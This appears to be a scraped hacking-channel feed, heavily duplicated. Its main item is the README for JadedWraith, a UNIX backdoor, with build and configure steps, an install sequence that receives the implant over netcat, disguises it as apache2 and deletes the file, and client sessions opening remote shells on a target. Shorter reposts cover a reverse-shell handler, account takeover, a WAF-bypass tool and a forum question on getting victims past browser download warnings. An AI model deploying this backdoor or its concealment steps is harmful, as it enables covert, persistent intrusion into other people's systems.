Hacking Articles Tips Tricks Videos Tutorials
Photo
Kali Linux Tutorials
JadedWraith : Light-weight UNIX Backdoor
JadedWraith is a Lightweight UNIX backdoor for ethical hacking. Useful for red team engagements and CTFs. Something I wrote a few years ago as part of a game I was playing with a friend to try to backdoor as many VMs in each other’s labs without being caught or having our tools reverse engineered/signatured. Features
JadedWraith is a powerful backdoor capable of either listening on a TCP port or sniffing packets for a “magic” ICMP packet instructing the backdoor to either callback or listen. This is partly inspired by tools such as PRISM, however, unlike PRISM JadedWraith incorporates shoddy cryptography to obfuscate command and control. JadedWraith can be used to execute remote commands or upload follow on payloads.
JadedWraith can be compiled as a standalone executable or as a shared object for process injection. Components
The source code for the actual implant can be found inside the
The implant requires a modern C library and libpthread. Depending on the target operating system, libpcap may be required (In which case, it you must run the
The Python configuration script and client require the the following packages to work: termcolor, pycryptodomex How To Compile
Simply use the
$ ./configure
$ make
$ ls -lart bin
-rwxrwxr-x. 1 root root 19712 Jul 31 13:08 JadedWraith-2.0.0-Linux-x86_64.elf
How To Configure
Use the
$ ./conf_jawr
JadedWraith Configuration
Please choose a JadedWraith binary to use:
1. JadedWraith-2.0.0-Linux-x86_64.elf
Binary : 1
Shared Key [95454c93c8d5d30a0782da72ade10e29] :
Enable passive mode (ICMP wakeup) ? [y/n] y
Wakeup Password [4Zw2TTtaIKBcyeoLwd7rrTasRlUF90vSZnLFzn2A4ab018Vj] :
argv[0] (Leave blank to not spoof command) [] :
JadedWraith Executable : /tmp/JadedWraith/configured/builds/JadedWraith-2.0.0-Linux-x86_64.1627752415.bin
Try me!
sudo ./wraith-client.py -k 95454c93c8d5d30a0782da72ade10e29 -P 4Zw2TTtaIKBcyeoLwd7rrTasRlUF90vSZnLFzn2A4ab018Vj shell
How To Install
A configured implant can simply be ran on the target system. If configured to use the passive ICMP functionality, it must be ran as root. The environmental variable _CMD can be used to spoof the process’s
#nc -lvp 4444 > apache2
#chmod +x apache2
#_CMD=”/usr/sbin/apache2″ ./apache2
#rm apache2
How To Interact
The
~/JadedWraithFork/client> sudo ./wraith-client.py 192.168.100.224 -k 1deeb4a64440b8d13c84a8eb4e7c4453 -P y00nrnwpwXdvPOXSS6K0r7LelFeCBvKx91Oj0s5BrnLyx1WR shell
[+] sent ICMP wake up command to 192.168.100.224
[] backdoor will listen on port 58290 [] connecting to 192.168.100.224:58290
[+] connection established!
[] entering interactive shell .cd /tmp w 14:22:49 up 3:02, 1 user, load average: 0.18, 0.19, 0.23 USER TTY LOGIN@ IDLE JCPU PCPU WHAT ps -ef UID PID PPID C STIME TTY TIME CMD root 1 0 0 11:20 ? 00:0[...]
___________________________
@hacking_Attack
@Hacking_Video
JadedWraith : Light-weight UNIX Backdoor
JadedWraith is a Lightweight UNIX backdoor for ethical hacking. Useful for red team engagements and CTFs. Something I wrote a few years ago as part of a game I was playing with a friend to try to backdoor as many VMs in each other’s labs without being caught or having our tools reverse engineered/signatured. Features
JadedWraith is a powerful backdoor capable of either listening on a TCP port or sniffing packets for a “magic” ICMP packet instructing the backdoor to either callback or listen. This is partly inspired by tools such as PRISM, however, unlike PRISM JadedWraith incorporates shoddy cryptography to obfuscate command and control. JadedWraith can be used to execute remote commands or upload follow on payloads.
JadedWraith can be compiled as a standalone executable or as a shared object for process injection. Components
The source code for the actual implant can be found inside the
srcdirectory. clientcontains a simple python based client for interacting with JadedWraith. The conf_jawrscript is used to configure new JadedWraith executables. DependenciesThe implant requires a modern C library and libpthread. Depending on the target operating system, libpcap may be required (In which case, it you must run the
./configurescript with --use-libpcapto enable libpcap support).The Python configuration script and client require the the following packages to work: termcolor, pycryptodomex How To Compile
Simply use the
Makefileto compile. Note: The resulting binaries found in binmust be configured before they can be used.$ ./configure
$ make
$ ls -lart bin
-rwxrwxr-x. 1 root root 19712 Jul 31 13:08 JadedWraith-2.0.0-Linux-x86_64.elf
How To Configure
Use the
conf_jawrscript to configure JadedWraith executables. It will search the bindirectory for JadedWraith executables to configure. The configured binary will be written to the configureddirectory.$ ./conf_jawr
JadedWraith Configuration
Please choose a JadedWraith binary to use:
1. JadedWraith-2.0.0-Linux-x86_64.elf
Binary : 1
Shared Key [95454c93c8d5d30a0782da72ade10e29] :
Enable passive mode (ICMP wakeup) ? [y/n] y
Wakeup Password [4Zw2TTtaIKBcyeoLwd7rrTasRlUF90vSZnLFzn2A4ab018Vj] :
argv[0] (Leave blank to not spoof command) [] :
JadedWraith Executable : /tmp/JadedWraith/configured/builds/JadedWraith-2.0.0-Linux-x86_64.1627752415.bin
Try me!
sudo ./wraith-client.py -k 95454c93c8d5d30a0782da72ade10e29 -P 4Zw2TTtaIKBcyeoLwd7rrTasRlUF90vSZnLFzn2A4ab018Vj shell
How To Install
A configured implant can simply be ran on the target system. If configured to use the passive ICMP functionality, it must be ran as root. The environmental variable _CMD can be used to spoof the process’s
argv[]#cd /tmp#nc -lvp 4444 > apache2
#chmod +x apache2
#_CMD=”/usr/sbin/apache2″ ./apache2
#rm apache2
How To Interact
The
wraith-client.pyscript inside clientcan be used to interact with JadedWraith. Simply invoke it with the arguments produced by the conf_jawrscript, substituting the target’s IP for . If utilizing the ICMP functionality, the script must be ran as root to send the ICMP packet.~/JadedWraithFork/client> sudo ./wraith-client.py 192.168.100.224 -k 1deeb4a64440b8d13c84a8eb4e7c4453 -P y00nrnwpwXdvPOXSS6K0r7LelFeCBvKx91Oj0s5BrnLyx1WR shell
[+] sent ICMP wake up command to 192.168.100.224
[] backdoor will listen on port 58290 [] connecting to 192.168.100.224:58290
[+] connection established!
[] entering interactive shell .cd /tmp w 14:22:49 up 3:02, 1 user, load average: 0.18, 0.19, 0.23 USER TTY LOGIN@ IDLE JCPU PCPU WHAT ps -ef UID PID PPID C STIME TTY TIME CMD root 1 0 0 11:20 ? 00:0[...]
___________________________
@hacking_Attack
@Hacking_Video
Kali Linux Tutorials
JadedWraith : Light-weight UNIX Backdoor !!! Kali Linux
JadedWraith is a Lightweight UNIX backdoor for ethical hacking. Useful for red team engagements and CTFs. Something I wrote a few years ago.
Hacking Articles Tips Tricks Videos Tutorials
Kali Linux Tutorials JadedWraith : Light-weight UNIX Backdoor JadedWraith is a Lightweight UNIX backdoor for ethical hacking. Useful for red team engagements and CTFs. Something I wrote a few years ago as part of a game I was playing with a friend to try…
0:01 /usr/lib/systemd/systemd –switched-root –system –deserialize 31 .exit sudo ./wraith-client.py 127.0.0.1 –callback 192.168.100.224 -k 1deeb4a64440b8d13c84a8eb4e7c4453 -P y00nrnwpwXdvPOXSS6K0r7LelFeCBvKx91Oj0s5BrnLyx1WR shell [+] sent ICMP wake up command to 127.0.0.1 [] backdoor will connect to port 37943
[] listening on port 37943 [+] accepted connection! [] entering interactive shell Download
___________________________
@hacking_Attack
@Hacking_Video
[] listening on port 37943 [+] accepted connection! [] entering interactive shell Download
___________________________
@hacking_Attack
@Hacking_Video
facebook accessstoken leak in android (unfixed )
i found accesstoken leak. any malicious app can get facebook accessstokenContinue reading on Medium »
Read more...
i found accesstoken leak. any malicious app can get facebook accessstokenContinue reading on Medium »
Read more...
Pwncat — Fancy Reverse And Bind Shell Handler
pwncat is a post-exploitation platform for Linux targets. It started out as a wrapper around basic bind and reverse shells and has grown…Continue reading on Medium »
Read more...
pwncat is a post-exploitation platform for Linux targets. It started out as a wrapper around basic bind and reverse shells and has grown…Continue reading on Medium »
Read more...
The BugéDex Workshop— My experience and what your takeaway should be from it
For the uninitiated, BugéDex is a workshop on Bug Bounty and Reporting hosted by CSI-VIT with cybersecurity experts from CloudSEK leading…Continue reading on Medium »
Read more...
For the uninitiated, BugéDex is a workshop on Bug Bounty and Reporting hosted by CSI-VIT with cybersecurity experts from CloudSEK leading…Continue reading on Medium »
Read more...
Account Takeover Vulnerability(admin + any user) via Password Reset
This is my First vulnerability disclosure, Luckily I found this vulnerability on the occasion of Ganesh Chaturthi.Continue reading on Medium »
Read more...
This is my First vulnerability disclosure, Luckily I found this vulnerability on the occasion of Ganesh Chaturthi.Continue reading on Medium »
Read more...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
$5k Service dependencies
The bug
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
$5k Service dependencies
The bug
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
$5k Service dependencies
The bug
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Pwncat — Fancy Reverse And Bind Shell Handler
https://cdn-images-1.medium.com/max/640/0*VEPhAhC1_mGQsOzs.png
pwncat is a post-exploitation platform for Linux targets. It started out as a wrapper around basic bind and reverse shells and has grown…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Pwncat — Fancy Reverse And Bind Shell Handler
https://cdn-images-1.medium.com/max/640/0*VEPhAhC1_mGQsOzs.png
pwncat is a post-exploitation platform for Linux targets. It started out as a wrapper around basic bind and reverse shells and has grown…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Pwncat — Fancy Reverse And Bind Shell Handler
pwncat is a post-exploitation platform for Linux targets. It started out as a wrapper around basic bind and reverse shells and has grown…
Account Takeover Vulnerability(admin + any user) via Password Reset
https://medium.com/@gaurav3112verma/account-takeover-vulnerability-admin-any-user-via-password-reset-1cb4d5057e35?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://medium.com/@gaurav3112verma/account-takeover-vulnerability-admin-any-user-via-password-reset-1cb4d5057e35?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Account Takeover Vulnerability(admin + any user) via Password Reset
This is my First vulnerability disclosure, Luckily I found this vulnerability on the occasion of Ganesh Chaturthi. When I complete my cyber…
This is my First vulnerability disclosure, Luckily I found this vulnerability on the occasion of Ganesh Chaturthi.Continue reading on Medium » (https://medium.com/@gaurav3112verma/account-takeover-vulnerability-admin-any-user-via-password-reset-1cb4d5057e35?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Account Takeover Vulnerability(admin + any user) via Password Reset
This is my First vulnerability disclosure, Luckily I found this vulnerability on the occasion of Ganesh Chaturthi. When I complete my cyber…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Phrack Magazine Issue 70
https://3.bp.blogspot.com/-D44pcoGQpVY/WWlvlv4DR7I/AAAAAAAAIRA/cd0U1aMX9aAjFzK0BP_4B5_C_6s8ROTKQCLcBGAs/s1600/h99.png
Phrack Magazine Issue 70 - Articles include Phrack Prophile on xerub, Attacking JavaScript Engines, .NET Instrumentation via MSIL bytecode injection, a VM escape QEMU case study, and much more.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Phrack Magazine Issue 70
https://3.bp.blogspot.com/-D44pcoGQpVY/WWlvlv4DR7I/AAAAAAAAIRA/cd0U1aMX9aAjFzK0BP_4B5_C_6s8ROTKQCLcBGAs/s1600/h99.png
Phrack Magazine Issue 70 - Articles include Phrack Prophile on xerub, Attacking JavaScript Engines, .NET Instrumentation via MSIL bytecode injection, a VM escape QEMU case study, and much more.
MD5 |
abec118a40d83ac9f0974d89dbebfeefDownload
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Phrack Magazine Issue 70
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
KitPloit - PenTest Tools!
pFuzz - Helps Us To Bypass Web Application Firewall By Using Different Methods At The Same Time
___________________________
@hacking_Attack
@Hacking_Video
pFuzz - Helps Us To Bypass Web Application Firewall By Using Different Methods At The Same Time
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Kitploit – Maintenance in Progress
Kitploit is temporarily under maintenance. We’ll be back shortly with improvements.
hacking: security in practice
downloading payload
say you get a victim to click on a link to download the payload. but google chrome gives a prompt saying "this type of file can harm your computer "
how do you get around this? is there way to make it safe for browsers
submitted by /u/ball-sack-patato
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
downloading payload
say you get a victim to click on a link to download the payload. but google chrome gives a prompt saying "this type of file can harm your computer "
how do you get around this? is there way to make it safe for browsers
submitted by /u/ball-sack-patato
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
downloading payload
say you get a victim to click on a link to download the payload. but google chrome gives a prompt saying "this type of file can harm your computer...
hacking: security in practice
Is it possible to get a list of valid DNS names from an IP?
Basically the title, i tried various reverse lookups and always got just one result. Any tips would be more than welcome!
submitted by /u/Inter_Fector1
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
Is it possible to get a list of valid DNS names from an IP?
Basically the title, i tried various reverse lookups and always got just one result. Any tips would be more than welcome!
submitted by /u/Inter_Fector1
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
Is it possible to get a list of valid DNS names from an IP?
Basically the title, i tried various reverse lookups and always got just one result. Any tips would be more than welcome!
hacking: security in practice
An ex hacked my email and I was wondering what I should do to make sure he stops
A little while ago I had an ex acquaintance hack my email. When I went to change my password he immediately tried to hack it again. I figured it was him when I traced his IP to the small town he lives in.
I am not even sure how he got my email. I am guessing he managed to hack my social media in order to get it, though I am not sure which account he got it from. I am guessing he also got my phone and address. I changed my phone number, and email to avoid any potential conflict. The other weird part is I hadn't seen or spoken to him in years. We didn't even date.
I eventually closed down much of my social presence just so I focus more on people in the here and now. I am concerned he may try to track me down in an intrusive way in the future.
What's the best way to safeguard this kind of behavior in the future? I started doing a secure sign in with my info on my banks, and other services I pay for like my internet and phone.
If he attempts to hack me again I will contact his provider. I am not sure he is physically stalking me. He had done it the past though.
submitted by /u/Majestic_Emu_77
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
An ex hacked my email and I was wondering what I should do to make sure he stops
A little while ago I had an ex acquaintance hack my email. When I went to change my password he immediately tried to hack it again. I figured it was him when I traced his IP to the small town he lives in.
I am not even sure how he got my email. I am guessing he managed to hack my social media in order to get it, though I am not sure which account he got it from. I am guessing he also got my phone and address. I changed my phone number, and email to avoid any potential conflict. The other weird part is I hadn't seen or spoken to him in years. We didn't even date.
I eventually closed down much of my social presence just so I focus more on people in the here and now. I am concerned he may try to track me down in an intrusive way in the future.
What's the best way to safeguard this kind of behavior in the future? I started doing a secure sign in with my info on my banks, and other services I pay for like my internet and phone.
If he attempts to hack me again I will contact his provider. I am not sure he is physically stalking me. He had done it the past though.
submitted by /u/Majestic_Emu_77
[link] [comments]
___________________________
@hacking_Attack
@Hacking_Video
reddit
An ex hacked my email and I was wondering what I should do to make...
A little while ago I had an ex acquaintance hack my email. When I went to change my password he immediately tried to hack it again. I figured it...